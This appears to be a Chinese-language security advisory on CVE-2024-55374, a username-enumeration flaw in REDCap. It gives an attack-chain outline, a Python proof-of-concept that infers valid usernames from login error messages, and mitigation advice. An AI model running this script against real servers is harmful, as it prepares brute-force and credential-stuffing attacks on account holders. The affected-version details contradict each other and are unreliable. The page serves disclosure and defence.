CVE-2024-55374: REDCap用户名枚举漏洞

漏洞信息

漏洞编号

CVE-2024-55374

漏洞类型

用户名枚举

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

REDCap

漏洞概述

CVE-2024-55374是REDCap 14.3.13版本中存在的一个用户名枚举漏洞。该漏洞允许未经认证的攻击者通过观察登录尝试时的系统响应差异来枚举有效的用户名。攻击者可以利用此漏洞获取系统中的有效用户名列表，为后续的暴力破解攻击、凭证填充攻击或社会工程攻击提供便利条件。由于该漏洞无需任何特殊权限即可利用，且攻击复杂度较低，因此对使用受影响版本REDCap的组织构成一定的安全风险。CVSS评分5.3表明该漏洞属于中等严重程度，主要影响系统的机密性。

技术细节

该漏洞源于REDCap在处理登录请求时，对于存在和不存在用户的响应存在可观察的差异。攻击者可以通过发送大量的登录请求，自动化地测试不同的用户名，观察系统的响应特征差异（如错误消息内容、响应时间、错误码等），从而确定哪些用户名在系统中存在。一旦攻击者获取了有效的用户名列表，他们可以针对这些用户实施更精准的暴力破解或凭证填充攻击。此外，用户名枚举也可能泄露组织结构信息和员工信息，为进一步的攻击提供情报支持。该漏洞的攻击向量为网络级别，攻击者无需任何前置访问权限或用户交互即可实施攻击。

攻击链分析

STEP 1

步骤1

攻击者访问REDCap登录页面

STEP 2

步骤2

攻击者构造登录请求，使用不同的用户名进行测试

STEP 3

步骤3

攻击者观察系统响应差异（错误消息、响应时间、状态码等）

STEP 4

步骤4

通过响应差异判断哪些用户名在系统中存在

STEP 5

步骤5

攻击者收集有效用户名列表，用于后续攻击

STEP 6

步骤6

结合暴力破解或凭证填充攻击尝试获取账户访问权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import re

target_url = "http://target-redcap-server/redcap/api/auth/"

# List of usernames to test
usernames = ["admin", "testuser", "user1", "john.doe", "jane.smith"]

def test_username_enum(username):
    """
    Test if a username exists by observing login response differences
    """
    # Payload for login attempt
    payload = {
        "username": username,
        "password": "wrongpassword123",
        "action": "login"
    }
    
    try:
        response = requests.post(target_url, data=payload, timeout=10)
        
        # Analyze response for username enumeration indicators
        if "Invalid username" in response.text or "User not found" in response.text:
            return {"status": "invalid", "username": username}
        elif "Invalid password" in response.text or "incorrect" in response.text.lower():
            return {"status": "valid", "username": username}
        elif response.status_code == 200 and "exists" in response.text.lower():
            return {"status": "valid", "username": username}
        else:
            return {"status": "unknown", "username": username}
            
    except requests.RequestException as e:
        return {"status": "error", "username": username, "message": str(e)}

# Run enumeration
print("Starting username enumeration attack...")
valid_users = []

for username in usernames:
    result = test_username_enum(username)
    if result["status"] == "valid":
        print(f"[+] Valid username found: {username}")
        valid_users.append(username)
    else:
        print(f"[-] Invalid username: {username}")

print(f"\nEnumeration complete. Found {len(valid_users)} valid usernames.")

影响范围

REDCap < 14.3.13

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）统一所有登录失败场景的错误消息，避免泄露用户是否存在信息；2）对登录接口实施严格的速率限制和IP封锁策略；3）启用账户锁定机制，连续失败后临时禁用账户；4）部署WAF规则监控和阻止异常登录请求；5）强制要求用户使用强密码并启用多因素认证；6）监控登录日志，及时发现和响应用户名枚举行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2024-55374
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2024-55374
3 Details https://www.cvedetails.com/cve/CVE-2024-55374/
4 VulDB https://vuldb.com/cve/CVE-2024-55374
5 Link http://redcap.com
6 Link https://github.com/T3slaa/CVE-2024-55374